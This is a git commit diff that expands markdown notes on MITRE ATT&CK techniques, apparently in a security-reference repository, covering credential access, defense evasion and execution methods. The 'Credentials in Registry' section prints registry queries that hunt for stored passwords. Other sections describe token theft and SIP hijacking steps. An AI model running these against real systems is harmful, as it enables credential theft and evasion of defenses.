Browse Source

Update to ATT&CK structure, so that it actually reflects the current model. Next update will be content additions to the ATT&CK sections

pull/14/head
rmusser01 4 years ago
parent
commit
36d319e223
48 changed files with 1966 additions and 901 deletions
  1. +20
    -6
      Draft/ATT&CK-Stuff/Collection.md
  2. +16
    -0
      Draft/ATT&CK-Stuff/Command_and_Control.md
  3. +33
    -0
      Draft/ATT&CK-Stuff/Credential_Access.md
  4. +114
    -15
      Draft/ATT&CK-Stuff/Defense_Evasion.md
  5. +25
    -2
      Draft/ATT&CK-Stuff/Discovery.md
  6. +176
    -63
      Draft/ATT&CK-Stuff/Execution.md
  7. +76
    -0
      Draft/ATT&CK-Stuff/Initial_Access.md
  8. +42
    -11
      Draft/ATT&CK-Stuff/Lateral Movement.md
  9. +121
    -33
      Draft/ATT&CK-Stuff/Persistence.md
  10. +110
    -51
      Draft/ATT&CK-Stuff/Privilege_Escalation.md
  11. +7
    -1
      Draft/AnonOpsecPrivacy.md
  12. +2
    -1
      Draft/Attacking Defending Android -.md
  13. +13
    -0
      Draft/Basic Security Information.md
  14. +13
    -0
      Draft/Building A Pentest Lab.md
  15. +2
    -1
      Draft/Cheat sheets reference pages Checklists -.md
  16. +4
    -0
      Draft/Courses_Training.md
  17. +68
    -52
      Draft/Cryptography & Encryption.md
  18. +38
    -9
      Draft/Defense.md
  19. +14
    -7
      Draft/Documentation & Reports -.md
  20. +5
    -0
      Draft/Embedded Device & Hardware Hacking -.md
  21. +3
    -0
      Draft/Exfiltration.md
  22. +8
    -0
      Draft/Exploit Development.md
  23. +2
    -0
      Draft/Forensics Incident Response.md
  24. +22
    -15
      Draft/Fuzzing Bug Hunting.md
  25. +57
    -48
      Draft/Game Hacking.md
  26. +8
    -1
      Draft/Interesting Things Useful stuff.md
  27. +9
    -1
      Draft/Malware.md
  28. +17
    -4
      Draft/Network Attacks & Defenses.md
  29. +13
    -0
      Draft/Network Security Monitoring & Logging.md
  30. +2
    -0
      Draft/Open Source Intelligence.md
  31. +20
    -13
      Draft/Password Bruting and Hashcracking.md
  32. +13
    -1
      Draft/Phishing.md
  33. +28
    -30
      Draft/Policy-Compliance.md
  34. +6
    -2
      Draft/Port_List.md
  35. +58
    -20
      Draft/Privilege Escalation & Post-Exploitation.md
  36. +19
    -0
      Draft/Programming - Languages Libs Courses References.md
  37. +40
    -4
      Draft/Red-Teaming.md
  38. +11
    -1
      Draft/Reverse Engineering.md
  39. +29
    -16
      Draft/Rootkits.md
  40. +3
    -4
      Draft/SCADA.md
  41. +13
    -4
      Draft/System Internals Windows and Linux Internals Reference.md
  42. +219
    -149
      Draft/Web & Browsers.md
  43. +30
    -8
      Draft/Wireless Networks & RF.md
  44. +10
    -1
      Draft/config.json
  45. +5
    -0
      Draft/theme-blue-min.css
  46. +5
    -0
      Draft/theme-min-blue.css
  47. +23
    -0
      Draft/theme.min.css
  48. +394
    -327
      Draft/things-added.md

+ 20
- 6
Draft/ATT&CK-Stuff/Collection.md View File

@ -54,12 +54,6 @@
-------------------------------
## Browser Extensions
* [Browser Extensions - ATT&CK](https://attack.mitre.org/wiki/Technique/T1176)
* Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access.12
-------------------------------
## Clipboard Data
* [Clipboard Data - ATT&CK](https://attack.mitre.org/wiki/Technique/T1115)
@ -87,6 +81,26 @@
-------------------------------
## Data from Information Repositories
* [Data from Information Repositories - ATT&CK](https://attack.mitre.org/wiki/Technique/T1213)
* Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.
* The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
* Common information repositories:
* Microsoft SharePoint
* Found in many enterprise networks and often used to store and share significant amounts of documentation.
* Atlassian Confluence
* Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation.
-------------------------------
## Data from Local System


+ 16
- 0
Draft/ATT&CK-Stuff/Command_and_Control.md View File

@ -206,6 +206,22 @@
-------------------------------
## Port Knocking
* [Port Knocking - ATT&CK](https://attack.mitre.org/wiki/Technique/T1205)
* Port Knocking is a well-established method used by both defenders and adversaries to hide open ports from access. To enable the port, the system expects a series of packets with certain characteristics before the port will be opened. This is often accomlished by the host based firewall, but could also be implemented by custom software.
* This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
* The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
-------------------------------
## Remote Access Tools
* [Remote Access Tools](https://attack.mitre.org/wiki/Technique/T1219)
* An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
* Remote access tools may be established and used post-compromise as alternate communications channel for Redundant Access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
## Remote File Copy


+ 33
- 0
Draft/ATT&CK-Stuff/Credential_Access.md View File

@ -148,6 +148,27 @@ Memory corruption is for wussies
----------------------------
## Credentials in Registry
* [Credentials in Registry - ATT&CK](https://attack.mitre.org/wiki/Technique/T1214)
* The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
* Example commands to find Registry keys related to password information:1
* Local Machine Hive: `reg query HKLM /f password /t REG_SZ /s`
* Current User Hive: `reg query HKCU /f password /t REG_SZ /s`
----------------------------
## Exploitation for Credential Access
* [Exploitation for Credential Access - ATT&CK](https://attack.mitre.org/wiki/Technique/T1212)
* Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions. Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.
----------------------------
## Exploitation of Vulnerability
* [Exploitation of Vulnerability - ATT&CK](https://attack.mitre.org/wiki/Technique/T1068)
@ -250,6 +271,18 @@ Memory corruption is for wussies
* A pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX.
-------------------------------
## Kerberoasting
* [Kerberoasting - ATT&CK](https://attack.mitre.org/wiki/Technique/T1208)
* Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service).
* Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).67 Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks that may expose plaintext credentials.
* This same attack could be executed using service tickets captured from network traffic.
-------------------------------
## Keychain
* [Keychain - ATT&CK](https://attack.mitre.org/wiki/Technique/T1142)


+ 114
- 15
Draft/ATT&CK-Stuff/Defense_Evasion.md View File

@ -10,11 +10,15 @@
-------------------------------
## Access Token Manipulation
* [Access Token Manipulation - ATT&CK](https://attack.mitre.org/wiki/Technique/T1134)
* Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command runas. Microsoft runas
* Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level.Pentestlab Token Manipulation
* Adversaries can also create spoofed access tokens if they know the credentials of a user. Any standard user can use the runas command, and the Windows API functions, to do this; it does not require access to an administrator account.
* Lastly, an adversary can use a spoofed token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.
* Metasploit’s Meterpreter payload allows arbitrary token stealing and uses token stealing to escalate privileges. Metasploit access token The Cobalt Strike beacon payload allows arbitrary token stealing and can also create tokens. Cobalt Strike Access Token
* Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command runas.
* Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.
* Access tokens can be leveraged by adversaries through three methods:
* **Token Impersonation/Theft** - An adversary creates a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system.
* **Create Process with a Token** - An adversary creates a new access token with `DuplicateToken(Ex)` and uses it with `CreateProcessWithTokenW` to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.
* **Make and Impersonate Token** - An adversary has a username and password but the user is not logged onto the system. The adversary can then create a logon session for the user using the `LogonUser` function. The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.
* Any standard user can use the `runas` command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account.
* Metasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens.
#### Windows
* [Access Token Manipulation - ATT&CK](https://attack.mitre.org/wiki/Technique/T1134)
@ -29,6 +33,21 @@
* [Account Hunting for Invoke-TokenManipulation](https://www.trustedsec.com/2015/01/account-hunting-invoke-tokenmanipulation/)
-------------------------------
## BITS Jobs
* [BITS Jobs - ATT&CK](https://attack.mitre.org/wiki/Technique/T1197)
* Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM)1.2 BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
* The interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool.
* Adversaries may abuse BITS to download, execute, and even clean up after malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.456 BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).
* BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.
-------------------------------
## Binary Padding
* [Binary Padding - ATT&CK](https://attack.mitre.org/wiki/Technique/T1009)
@ -37,6 +56,10 @@
-------------------------------
## Bypass User Account Control
* [Bypass User Account Control](https://attack.mitre.org/wiki/Technique/T1088)
@ -82,6 +105,15 @@
-------------------------------
* [CMSTP.exe - ATT&CK](https://attack.mitre.org/wiki/Technique/T1191)
* The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
* Adversaries may supply CMSTP.exe with INF files infected with malicious commands. Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.
* CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.
-------------------------------
## Code Signing
* [Code Signing - ATT&CK](https://attack.mitre.org/wiki/Technique/T1116)
@ -106,12 +138,19 @@
* [How to Evade Application Whitelisting Using REGSVR32 - BHIS](https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/)
-------------------------------
## Component Firmware
* [Component Firmware - ATT&CK](https://attack.mitre.org/wiki/Technique/T1109)
* Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to System Firmware but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.
* [HD Hacking - SpritesMods](http://spritesmods.com/?art=hddhack)
-------------------------------
## Component Object Model Hijacking
* [Component Object Model Hijacking](https://attack.mitre.org/wiki/Defense_Evasion)
@ -126,17 +165,30 @@ Component Object Model Hijacking
-------------------------------
## Control Panel Items
* [Control Panel Items - ATT&CK](https://attack.mitre.org/wiki/Technique/T1196)
* Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.
* For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.
* Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via Spearphishing Attachment campaigns 23 or executed as part of multi-stage malware.4 Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.
-------------------------------
## DLL Injection
* [DLL Injection - ATT&CK](https://attack.mitre.org/wiki/Defense_Evasion)
* DLL injection is used to run code in the context of another process by causing the other process to load and execute code. Running code in the context of another process provides adversaries many benefits, such as access to the process's memory and permissions. It also allows adversaries to mask their actions under a legitimate process. A more sophisticated kind of DLL injection, reflective DLL injection, loads code without calling the normal Windows API calls, potentially bypassing DLL load monitoring. Numerous methods of DLL injection exist on Windows, including modifying the Registry, creating remote threads, Windows hooking APIs, and DLL pre-loading.CodeProject Inject CodeWikipedia DLL Injection
## DCShadow
* [DCShadow - ATT&CK](https://attack.mitre.org/wiki/Technique/T1207)
* DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC). Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
* Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash.
* This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence.
#### Windows
* [DLL Injection - ATT&CK](https://attack.mitre.org/wiki/Technique/T1055)
* [DLL injection - Wikipedia](https://en.wikipedia.org/wiki/DLL_injection)
* [Inject All the Things - Shutup and Hack](http://blog.deniable.org/blog/2017/07/16/inject-all-the-things/)
* Writeup of 7 different injection techniques
* [Code - Github](https://github.com/fdiskyou/injectAllTheThings)
-------------------------------
@ -190,7 +242,11 @@ Component Object Model Hijacking
* [Invoke-Phant0m](https://github.com/hlldz/Invoke-Phant0m)
* This script walks thread stacks of Event Log Service process (spesific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running.
-------------------------------
## Exploitation for Defense Evasion
* [Exploitation for Defense Evasion - ATT&CK](https://attack.mitre.org/wiki/Technique/T1211)
* Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.
* Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for Security Software Discovery. The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.
-------------------------------
@ -344,6 +400,13 @@ Component Object Model Hijacking
-------------------------------
## Indirect Command Execution
* [Indirect Command Execution - ATT&CK](https://attack.mitre.org/wiki/Technique/T1202)
* Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command-Line Interface, Run window, or via scripts.
* Adversaries may abuse these utilities for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd.
-------------------------------
## Install Root Certificate
@ -503,6 +566,25 @@ Alternate Data Streams
-------------------------------
## Process Doppelgänging
* [Process Doppelgänging - ATT&CK](https://attack.mitre.org/wiki/Technique/T1186)
* Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction.
* Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10.
* Adversaries may leverage TxF to a perform a file-less variation of Process Injection called Process Doppelgänging. Similar to Process Hollowing, Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext.4
* Process Doppelgänging is implemented in 4 steps4:
* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
* Load – Create a shared section of memory and load the malicious executable.
* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.
* Animate – Create a process from the tainted section of memory and initiate execution.
-------------------------------
## Process Hollowing
* [Process Hollowing](https://attack.mitre.org/wiki/Technique/T1093)
@ -632,6 +714,23 @@ There are multiple approaches to injecting code into a live process. Windows imp
-------------------------------
## SIP and Trust Provider Hijacking
* [SIP and Trust Provider Hijacking - ATT&CK](https://attack.mitre.org/wiki/Technique/T1198)
* In user mode, Windows Authenticode1 digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature.
* Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all ) and are identified by globally unique identifiers (GUIDs).
* Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by:
* Modifying the `Dll` and `FuncName` Registry values in `HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}` that point to the dynamic link library (DLL) providing a SIP’s `CryptSIPDllGetSignedDataMsg` function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value all files using that SIP6 (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the `Dll` and `FuncName` Registry values in `HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}` that point to the DLL providing a SIP’s `CryptSIPDllVerifyIndirectData` function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP6 (with or without hijacking the previously mentioned `CryptSIPDllGetSignedDataMsg` function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the `DLL` and `Function` Registry values in `HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}` that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s `CryptSIPDllVerifyIndirectData` function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* Note: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.
* Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation.
-------------------------------
## Software Packing
* [Software Packing - ATT&CK](https://attack.mitre.org/wiki/Technique/T1045)


+ 25
- 2
Draft/ATT&CK-Stuff/Discovery.md View File

@ -57,8 +57,16 @@
### File and Directory Discovery
-------------------------------
## Browser Bookmark Discovery
* [Browser Bookmark Discovery](https://attack.mitre.org/wiki/Technique/T1217)
* Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
* Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially Credentials in Files associated with logins cached by a browser.
* Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.
-------------------------------
### File and Directory Discovery
* [File and Directory Discovery - ATT&CK](https://attack.mitre.org/wiki/Technique/T1083)
* Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
@ -303,8 +311,23 @@ get-WmiObject -list | where {$_.name -match “Printer”}
## Peripheral Device Discovery
-------------------------------
## Password Policy Discovery
* [Password Policy Discovery - ATT&CK](https://attack.mitre.org/wiki/Technique/T1201)
* Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through Brute Force. An adversary may attempt to access detailed information about the password policy used within an enterprise network. This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
* Password policies can be set and discovered on Windows, Linux, and macOS systems.
-------------------------------
## Peripheral Device Discovery
* [Peripheral Device Discovery - ATT&CK](https://attack.mitre.org/wiki/Technique/T1120)
* Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.


+ 176
- 63
Draft/ATT&CK-Stuff/Execution.md View File

@ -6,8 +6,26 @@
## AppleScript
-------------------------------
## Process Hollowing
* [Process Hollowing - ATT&CK](https://attack.mitre.org/wiki/Technique/T1093)
* Process hollowing occurs when a process is created in a suspended state and the process's memory is replaced with the code of a second program so that the second program runs instead of the original program. Windows and process monitoring tools believe the original process is running, whereas the actual program running is different. Hollowing Process hollowing may be used similarly to DLL Injection to evade defenses and detection analysis of malicious process execution by launching adversary-controlled code under the context of a legitimate process.
#### Windows
* [Process Hollowing - John Leitch - PDF](http://www.autosectools.com/process-hollowing.pdf)
* [Process-Hollowing](https://github.com/m0n0ph1/Process-Hollowing)
* Great explanation of Process Hollowing
-------------------------------
## AppleScript
* [AppleScript - ATT&CK](https://attack.mitre.org/wiki/Technique/T1155)
* macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the `osalang` program.
* AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@ -22,34 +40,17 @@
## Application Shimming
-------------------------------
* [Application Shimming - ATT&CK](https://attack.mitre.org/wiki/Technique/T1138)
* The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow compatibility of programs as Windows updates and changes its code. For example, application shimming feature that allows programs that were created for Windows XP to work with Windows 10. Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses API hooking to redirect the code as necessary in order to communicate with the OS. A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
* `%WINDIR%\AppPatch\sysmain.sdb`
* `hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb`
* Custom databases are stored in:
* `%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom`
* `hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom`
* To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Account Control (UAC) (RedirectEXE), inject DLLs into processes (InjectDll), and intercept memory addresses (GetProcAddress). Utilizing these shims, an adversary can perform several malicious acts, such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.
#### Windows
* [Understanding Shims](https://technet.microsoft.com/en-us/library/dd837644(v=ws.10).aspx)
* [Secrets of the Application Compatilibity Database (SDB) – Part 1](http://www.alex-ionescu.com/?p=39)
* [Secrets of the Application Compatilibity Database (SDB) – Part 2](http://www.alex-ionescu.com/?p=40)
* [Secrets of the Application Compatilibity Database (SDB) – Part 3](http://www.alex-ionescu.com/?p=41)
* [Secrets of the Application Compatilibity Database (SDB) – Part 4](http://www.alex-ionescu.com/?p=43)
* [Malicious Application Compatibility Shims](https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf)
* [Post Exploitation Persistence With Application Shims (Intro)](http://blacksunhackers.club/2016/08/post-exploitation-persistence-with-application-shims-intro/)
* [Windows 0wn3d By Default - Mark Baggett - Derbycon 2013](http://www.irongeek.com/i.php?page=videos/derbycon3/4206-windows-0wn3d-by-default-mark-baggett)
* Description: “In this talk we will discuss API Hooking, Process Execution Redirection, Hiding Registry keys and hiding directories on the hard drive. We must be talking about rootkits, right? Well yes, but not in the way you think. The Windows family of operating systems has all of these capabilities built right in! Using nothing but tools and techniques distributed and documented by Microsoft we can implement all of these rootkit functions. During this exciting talk I will present new attacks against Windows operating system that provide rootkit like functionality with built-in OS tools. In session, we’ll demonstrate how to leverage the Microsoft Application Compatibility Toolkit to help hide an attacker’s presence on your system. The Application Compatibility Toolkit allows you to create application shims that intercept and redirect calls from applications to the operating system. This native rootkit like capability is intended to make the Windows operating system compatible with very old or poorly written applications. Do DEP, ASLR, UAC, and Windows Resource Protection, File system ACLS and other modern OS security measures get it your way? No problem. Turn them off! Do you want to hide files and registry keys and from the user? The Application Compatibility toolkit allows you to create a virtual world for any application and hide resources from view. If someone inspects the registry with regedit they will see exactly what the attacker wants them to see and not what the OS sees when it launches programs. Did they patch your target so your exploit doesn’t work? Guess what, making applications backwards compatible is what this tool is intended to do. Make your favorite applications “old exploit compatible” insuring you can re-exploit the target with this awesome untapped resource. Everything you need to subvert windows applications is built right into the windows kernel. Come learn how to use the application compatibility toolkit to tap this great resource.”
* [Shackles, Shims, and Shivs - Understanding Bypass Techniques](http://www.irongeek.com/i.php?page=videos/derbycon6/535-shackles-shims-and-shivs-understanding-bypass-techniques-mirovengi)
-------------------------------
## CMSTP
* [CMSTP - ATT&CK](https://attack.mitre.org/wiki/Technique/T1191)
* The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
* Adversaries may supply CMSTP.exe with INF files infected with malicious commands. Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.
* CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.
## Command-Line Interface
-------------------------------
## Command-Line Interface
* [Command-Line Interface - ATT&CK](https://attack.mitre.org/wiki/Technique/T1059)
* Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms.Wikipedia Command-Line Interface One example command-line interface on Windows systems is cmd, which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task). Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.
@ -63,8 +64,35 @@
## Execution through API
-------------------------------
## Control Panel Items
* [Control Panel Items - ATT&CK](https://attack.mitre.org/wiki/Technique/T1196)
* Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.
* For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.
